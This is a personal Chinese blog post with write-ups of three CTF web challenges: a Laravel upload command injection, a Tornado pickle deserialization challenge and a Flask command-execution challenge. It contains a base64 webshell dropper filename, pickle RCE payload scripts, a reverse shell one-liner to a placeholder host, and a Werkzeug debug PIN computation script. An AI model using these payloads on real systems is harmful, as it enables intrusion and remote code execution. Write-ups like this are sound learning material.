<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"ilikeoyt.github.io","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="D3ctf-d3cloud复现打开是一个Laravel页面 1Laravel是一个基于PHP编程语言的免费开源的Web应用程序框架，它的目标是提高Web应用程序的开发效率和可维护性。Laravel框架使用了现代的PHP开发技术，并提供了丰富的功能和工具，使得开发人员能够更快捷地构建高质量的Web应用程序。">
<meta property="og:type" content="article">
<meta property="og:title" content="5-8日常">
<meta property="og:url" content="https://ilikeoyt.github.io/2023/05/08/5-8%E6%97%A5%E5%B8%B8/index.html">
<meta property="og:site_name" content="ycx&#39;s blog">
<meta property="og:description" content="D3ctf-d3cloud复现打开是一个Laravel页面 1Laravel是一个基于PHP编程语言的免费开源的Web应用程序框架，它的目标是提高Web应用程序的开发效率和可维护性。Laravel框架使用了现代的PHP开发技术，并提供了丰富的功能和工具，使得开发人员能够更快捷地构建高质量的Web应用程序。">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://ilikeoyt.github.io/image/1.png">
<meta property="article:published_time" content="2023-05-08T09:17:15.000Z">
<meta property="article:modified_time" content="2023-05-08T09:26:22.489Z">
<meta property="article:author" content="ycxlo">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://ilikeoyt.github.io/image/1.png">

<link rel="canonical" href="https://ilikeoyt.github.io/2023/05/08/5-8%E6%97%A5%E5%B8%B8/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>

  <title>5-8日常 | ycx's blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">ycx's blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="https://ilikeoyt.github.io/2023/05/08/5-8%E6%97%A5%E5%B8%B8/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="ycxlo">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="ycx's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          5-8日常
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>
              

              <time title="Created: 2023-05-08 17:17:15 / Modified: 17:26:22" itemprop="dateCreated datePublished" datetime="2023-05-08T17:17:15+08:00">2023-05-08</time>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="D3ctf-d3cloud复现"><a href="#D3ctf-d3cloud复现" class="headerlink" title="D3ctf-d3cloud复现"></a>D3ctf-d3cloud复现</h1><p>打开是一个Laravel页面</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Laravel是一个基于PHP编程语言的免费开源的Web应用程序框架，它的目标是提高Web应用程序的开发效率和可维护性。Laravel框架使用了现代的PHP开发技术，并提供了丰富的功能和工具，使得开发人员能够更快捷地构建高质量的Web应用程序。</span><br></pre></td></tr></table></figure>
<span id="more"></span>
<p>Laravel的管理员默认登录页面为admin</p>
<p>进入&#x2F;admin，输入admin&#x2F;admin进入页面</p>
<p>进入media路由，发现一个FilesystemAdapter.php，这个是个插件，可以在其中发现这样一段代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="variable">$file</span>-&gt;<span class="title function_ invoke__">getClientOriginalExtension</span>() === <span class="string">&quot;zip&quot;</span>) &#123;</span><br><span class="line">            <span class="variable">$fs</span> = <span class="title function_ invoke__">popen</span>(<span class="string">&quot;unzip -oq &quot;</span>. <span class="variable">$this</span>-&gt;driver-&gt;<span class="title function_ invoke__">getAdapter</span>()-&gt;<span class="title function_ invoke__">getPathPrefix</span>() . <span class="variable">$name</span> .<span class="string">&quot; -d &quot;</span> . <span class="variable">$this</span>-&gt;driver-&gt;<span class="title function_ invoke__">getAdapter</span>()-&gt;<span class="title function_ invoke__">getPathPrefix</span>(),<span class="string">&quot;w&quot;</span>);</span><br><span class="line">            <span class="title function_ invoke__">pclose</span>(<span class="variable">$fs</span>);</span><br><span class="line">        &#125;</span><br></pre></td></tr></table></figure>

<p>直接对文件名进行拼接了，而popen函数可以直接对其中的第一个参数执行命令</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">popen</span>(<span class="string">&#x27;whoami&#x27;</span>,<span class="string">&#x27;w&#x27;</span>);</span><br></pre></td></tr></table></figure>

<p>第二个参数是必需的</p>
<p>直接修改文件名为：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">1123.zip || echo PD9waHAgZXZhbCgkX1JFUVVFU1RbInNoZWxsIl0pOw== | base64 -d &gt; </span><br><span class="line">shell.php # .zip</span><br></pre></td></tr></table></figure>

<p>访问shell.php，shell为参数执行命令即可</p>
<h1 id="CISCN2019-华北赛区-Day1-Web2-ikun"><a href="#CISCN2019-华北赛区-Day1-Web2-ikun" class="headerlink" title="[CISCN2019 华北赛区 Day1 Web2]ikun"></a>[CISCN2019 华北赛区 Day1 Web2]ikun</h1><p>页面提示一定要买到lv6，但两个页面均没有</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>, <span class="number">1001</span>, <span class="number">1</span>):</span><br><span class="line">    url = <span class="string">&quot;http://node1.anna.nssctf.cn:28316/shop?page=&quot;</span></span><br><span class="line">    url += <span class="built_in">str</span>(i)</span><br><span class="line">    x = requests.get(url)</span><br><span class="line">    <span class="keyword">if</span> <span class="string">&quot;lv6.png&quot;</span> <span class="keyword">in</span> x.text:</span><br><span class="line">        <span class="built_in">print</span>(i)</span><br></pre></td></tr></table></figure>

<p>找到在181页，但是lv6太贵买不起，抓包看看，有一个discount为0.8，将其改为0.0000000000001，放包后出现一个页面只能admin访问，再对其进行抓包，此时需要对jwt进行解密，在kali中利用jwtcrack对其进行解密后，得到密钥为1Kun</p>
<p>并将username修改为admin，替换jwt，提示static&#x2F;asd1f654e683wq&#x2F;<a target="_blank" rel="noopener" href="http://www.zip/">www.zip</a></p>
<p>涉及pickle反序列化漏洞</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@tornado.web.authenticated</span></span><br><span class="line">   <span class="keyword">def</span> <span class="title function_">post</span>(<span class="params">self, *args, **kwargs</span>):</span><br><span class="line">       <span class="keyword">try</span>:</span><br><span class="line">           become = self.get_argument(<span class="string">&#x27;become&#x27;</span>)</span><br><span class="line">           p = pickle.loads(urllib.unquote(become))</span><br><span class="line">           <span class="keyword">return</span> self.render(<span class="string">&#x27;form.html&#x27;</span>, res=p, member=<span class="number">1</span>)</span><br><span class="line">       <span class="keyword">except</span>:</span><br><span class="line">           <span class="keyword">return</span> self.render(<span class="string">&#x27;form.html&#x27;</span>, res=<span class="string">&#x27;This is Black Technology!&#x27;</span>, member=<span class="number">0</span>)</span><br></pre></td></tr></table></figure>

<p>脚本为</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"><span class="keyword">import</span> urllib</span><br><span class="line"><span class="keyword">import</span> commands</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">payload</span>(<span class="title class_ inherited__">object</span>):</span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">__reduce__</span>(<span class="params">self</span>):</span><br><span class="line">        <span class="keyword">return</span> (commands.getoutput, (<span class="string">&#x27;ls /&#x27;</span>,))<span class="comment"># 自python2.6开始被废除</span></span><br><span class="line">a = payload()</span><br><span class="line"><span class="built_in">print</span>(urllib.quote(pickle.dumps(a)))</span><br></pre></td></tr></table></figure>

<p>利用这个结果修改become参数，得到目录</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"><span class="keyword">import</span> urllib</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">exp</span>(<span class="title class_ inherited__">object</span>):</span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">__reduce__</span>(<span class="params">self</span>):</span><br><span class="line">        <span class="keyword">return</span> (<span class="built_in">eval</span>,(<span class="string">&quot;open(&#x27;/flag.txt&#x27;).read()&quot;</span>,))</span><br><span class="line"></span><br><span class="line">a=exp()</span><br><span class="line">s=pickle.dumps(a)</span><br><span class="line"><span class="built_in">print</span> (urllib.quote(s))</span><br></pre></td></tr></table></figure>

<p>得到flag</p>
<h1 id="NSSRound-7-Team-ShadowFlag"><a href="#NSSRound-7-Team-ShadowFlag" class="headerlink" title="[NSSRound#7 Team]ShadowFlag"></a>[NSSRound#7 Team]ShadowFlag</h1><figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask, request</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">from</span> time <span class="keyword">import</span> sleep</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"></span><br><span class="line">flag1 = <span class="built_in">open</span>(<span class="string">&quot;/tmp/flag1.txt&quot;</span>, <span class="string">&quot;r&quot;</span>)</span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&quot;/tmp/flag2.txt&quot;</span>, <span class="string">&quot;r&quot;</span>) <span class="keyword">as</span> f:</span><br><span class="line">    flag2 = f.read()</span><br><span class="line">tag = <span class="literal">False</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&quot;/&quot;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">index</span>():</span><br><span class="line">    <span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&quot;app.py&quot;</span>, <span class="string">&quot;r+&quot;</span>) <span class="keyword">as</span> f:</span><br><span class="line">        <span class="keyword">return</span> f.read()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&quot;/shell&quot;</span>, methods=[<span class="string">&#x27;POST&#x27;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">shell</span>():</span><br><span class="line">    <span class="keyword">global</span> tag</span><br><span class="line">    <span class="keyword">if</span> tag != <span class="literal">True</span>:</span><br><span class="line">        <span class="keyword">global</span> flag1</span><br><span class="line">        <span class="keyword">del</span> flag1</span><br><span class="line">        tag = <span class="literal">True</span></span><br><span class="line">    os.system(<span class="string">&quot;rm -f /tmp/flag1.txt /tmp/flag2.txt&quot;</span>)</span><br><span class="line">    action = request.form[<span class="string">&quot;act&quot;</span>]</span><br><span class="line">    <span class="keyword">if</span> action.find(<span class="string">&quot; &quot;</span>) != -<span class="number">1</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;Nonono&quot;</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        os.system(action)</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&quot;Wow&quot;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.errorhandler(<span class="params"><span class="number">404</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">error_date</span>(<span class="params">error</span>):</span><br><span class="line">    sleep(<span class="number">5</span>)</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&quot;扫扫扫，扫啥东方明珠呢[怒]&quot;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    app.run()</span><br></pre></td></tr></table></figure>

<p>在shell路由下可以执行命令，但是过滤了空格，并且没有回显，可以尝试反弹shell</p>
<p><a target="_blank" rel="noopener" href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#python">巨魔师傅的各种反弹shell集合</a></p>
<p>可以找到如下命令</p>
<figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3$IFS-c$IFS&#x27;a=__import__;s=a(&quot;socket&quot;).socket;o=a(&quot;os&quot;).dup2;p=a(&quot;pty&quot;).spawn;c=s();c.connect((&quot;xx.xx.xx.xx&quot;,<span class="number">2333</span>));f=c.fileno;o(f(),<span class="number">0</span>);o(f(),<span class="number">1</span>);o(f(),<span class="number">2</span>);p(&quot;/bin/sh&quot;)&#x27;</span><br></pre></td></tr></table></figure>

<p>第一个flag:我们可以发现第一个flag是利用open(“&#x2F;tmp&#x2F;flag1.txt”, “r”)打开的，而且并没有使用close关闭，那么这个flask还在运行，我们就可以在&#x2F;proc&#x2F;[pid]&#x2F;fd的内存中找到他。一般是存在15-35这个范围，我们一一寻找，最后 在&#x2F;proc&#x2F;17&#x2F;fd&#x2F;*中找到了</p>
<figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">$ cat /proc/<span class="number">16</span>/fd*</span><br><span class="line">cat /proc/<span class="number">16</span>/fd*</span><br><span class="line"><span class="function">cat: /<span class="title">proc</span>/16/<span class="title">fd</span>: <span class="title">Permission</span> <span class="title">denied</span></span></span><br><span class="line"><span class="function"><span class="title">cat</span>: /<span class="title">proc</span>/16/<span class="title">fdinfo</span>: <span class="title">Permission</span> <span class="title">denied</span></span></span><br><span class="line"><span class="function">$ <span class="title">cat</span> /<span class="title">proc</span>/16/<span class="title">fd</span>/*</span></span><br><span class="line"><span class="function"><span class="title">cat</span> /<span class="title">proc</span>/16/<span class="title">fd</span>/*</span></span><br><span class="line"><span class="function"><span class="title">cat</span>: &#x27;/<span class="title">proc</span>/16/<span class="title">fd</span>/*&#x27;: <span class="title">Permission</span> <span class="title">denied</span></span></span><br><span class="line"><span class="function">$ <span class="title">cat</span> /<span class="title">proc</span>/17/<span class="title">fd</span>/*</span></span><br><span class="line"><span class="function"><span class="title">cat</span> /<span class="title">proc</span>/17/<span class="title">fd</span>/*</span></span><br><span class="line"><span class="function"><span class="title">cat</span>: /<span class="title">proc</span>/17/<span class="title">fd</span>/1: <span class="title">Permission</span> <span class="title">denied</span></span></span><br><span class="line"><span class="function"><span class="title">cat</span>: /<span class="title">proc</span>/17/<span class="title">fd</span>/2: <span class="title">Permission</span> <span class="title">denied</span></span></span><br><span class="line"><span class="function"><span class="title">NSSCTF</span>&#123;6<span class="title">a530062</span>-<span class="title">bb51</span></span></span><br><span class="line"><span class="function"><span class="title">cat</span>: /<span class="title">proc</span>/17/<span class="title">fd</span>/4: <span class="title">No</span> <span class="title">such</span> <span class="title">device</span> <span class="title">or</span> <span class="title">address</span></span></span><br><span class="line"><span class="function"><span class="title">cat</span>: /<span class="title">proc</span>/17/<span class="title">fd</span>/6: <span class="title">No</span> <span class="title">such</span> <span class="title">device</span> <span class="title">or</span> <span class="title">address</span></span></span><br></pre></td></tr></table></figure>

<p>第二个flag：第二个flag就相对比较麻烦了，因为第二个flag是利用with open(“&#x2F;tmp&#x2F;flag2.txt”, “r”) as f:打开的，用with会默认打开使用后关闭这个文件，我们就只能从flask的环境中去寻找flag2这个变量了，大佬们第一个就想到了利用console（这个之前遇到最多的就是在ssti页面报错时进入的页面，其中有命令行功能，但是需要登录），但是利用console需要有Flask的Pin值，我们现在来看如何利用shell来计算Pin值</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">在Flask应用程序中，PIN（个人识别号码）通常用于身份验证目的，以确保只有授权用户可以访问受保护的资源或执行受限操作。例如，您可以要求用户输入他们的PIN码来访问他们的账户，或者要求员工输入他们的PIN码来访问内部系统或执行敏感操作。</span><br></pre></td></tr></table></figure>

<p>先看看脚本</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># sha1算法，适用于高版本flask</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line"><span class="keyword">from</span> itertools <span class="keyword">import</span> chain</span><br><span class="line">probably_public_bits = [</span><br><span class="line">    <span class="string">&#x27;ctf&#x27;</span><span class="comment"># /etc/passwd</span></span><br><span class="line">    <span class="string">&#x27;flask.app&#x27;</span>,<span class="comment"># 默认值</span></span><br><span class="line">    <span class="string">&#x27;Flask&#x27;</span>,<span class="comment"># 默认值</span></span><br><span class="line">    <span class="string">&#x27;/usr/local/lib/python3.10/site-packages/flask/app.py&#x27;</span> <span class="comment"># 报错得到</span></span><br><span class="line">]</span><br><span class="line"> </span><br><span class="line">private_bits = [</span><br><span class="line">    <span class="built_in">str</span>(<span class="built_in">int</span>(<span class="string">&quot;02:42:ac:02:67:22&quot;</span>.replace(<span class="string">&quot;:&quot;</span>,<span class="string">&quot;&quot;</span>),<span class="number">16</span>)),<span class="comment">#  /sys/class/net/eth0/address 16进制转10进制</span></span><br><span class="line">    <span class="comment">#machine_id由三个合并(docker就后两个)：1./etc/machine-id 2./proc/sys/kernel/random/boot_id 3./proc/self/cgroup</span></span><br><span class="line">    <span class="string">&quot;e0ad2d31-1d21-4f57-b1c5-4a9036fbf235&quot;</span>+<span class="string">&quot;a6a621a203a0e17ad7befe8cea9d6407f942b5bd98dcc1fad940d33632c07dea&quot;</span><span class="comment">#  /proc/self/cgroup</span></span><br><span class="line">]</span><br><span class="line"> </span><br><span class="line">h = hashlib.sha1()</span><br><span class="line"><span class="keyword">for</span> bit <span class="keyword">in</span> chain(probably_public_bits, private_bits):</span><br><span class="line">    <span class="keyword">if</span> <span class="keyword">not</span> bit:</span><br><span class="line">        <span class="keyword">continue</span></span><br><span class="line">    <span class="keyword">if</span> <span class="built_in">isinstance</span>(bit, <span class="built_in">str</span>):</span><br><span class="line">        bit = bit.encode(<span class="string">&#x27;utf-8&#x27;</span>)</span><br><span class="line">    h.update(bit)</span><br><span class="line">h.update(<span class="string">b&#x27;cookiesalt&#x27;</span>)</span><br><span class="line"> </span><br><span class="line">cookie_name = <span class="string">&#x27;__wzd&#x27;</span> + h.hexdigest()[:<span class="number">20</span>]</span><br><span class="line"> </span><br><span class="line">num = <span class="literal">None</span></span><br><span class="line"><span class="keyword">if</span> num <span class="keyword">is</span> <span class="literal">None</span>:</span><br><span class="line">    h.update(<span class="string">b&#x27;pinsalt&#x27;</span>)</span><br><span class="line">    num = (<span class="string">&#x27;%09d&#x27;</span> % <span class="built_in">int</span>(h.hexdigest(), <span class="number">16</span>))[:<span class="number">9</span>]</span><br><span class="line"> </span><br><span class="line">rv =<span class="literal">None</span></span><br><span class="line"><span class="keyword">if</span> rv <span class="keyword">is</span> <span class="literal">None</span>:</span><br><span class="line">    <span class="keyword">for</span> group_size <span class="keyword">in</span> <span class="number">5</span>, <span class="number">4</span>, <span class="number">3</span>:</span><br><span class="line">        <span class="keyword">if</span> <span class="built_in">len</span>(num) % group_size == <span class="number">0</span>:</span><br><span class="line">            rv = <span class="string">&#x27;-&#x27;</span>.join(num[x:x + group_size].rjust(group_size, <span class="string">&#x27;0&#x27;</span>)</span><br><span class="line">                          <span class="keyword">for</span> x <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="built_in">len</span>(num), group_size))</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        rv = num</span><br><span class="line"> </span><br><span class="line"><span class="built_in">print</span>(rv)</span><br></pre></td></tr></table></figure>

<p>然后到刚刚那个报错页面找到&#x2F;home&#x2F;ctf&#x2F;app.py，点击命令行图标，输入pin值，执行flag2命令即可得到后半段flag</p>
<p><img src="/image/1.png" alt="img"></p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2023/05/07/5-7%E6%97%A5%E5%B8%B8/" rel="prev" title="5-7日常">
      <i class="fa fa-chevron-left"></i> 5-7日常
    </a></div>
      <div class="post-nav-item">
    <a href="/2023/05/08/ejs%E6%A8%A1%E6%9D%BF%E5%BC%95%E6%93%8E%E5%AE%9E%E7%8E%B0RCE/" rel="next" title="ejs模板引擎实现RCE">
      ejs模板引擎实现RCE <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#D3ctf-d3cloud%E5%A4%8D%E7%8E%B0"><span class="nav-number">1.</span> <span class="nav-text">D3ctf-d3cloud复现</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#CISCN2019-%E5%8D%8E%E5%8C%97%E8%B5%9B%E5%8C%BA-Day1-Web2-ikun"><span class="nav-number">2.</span> <span class="nav-text">[CISCN2019 华北赛区 Day1 Web2]ikun</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#NSSRound-7-Team-ShadowFlag"><span class="nav-number">3.</span> <span class="nav-text">[NSSRound#7 Team]ShadowFlag</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">ycxlo</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">57</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
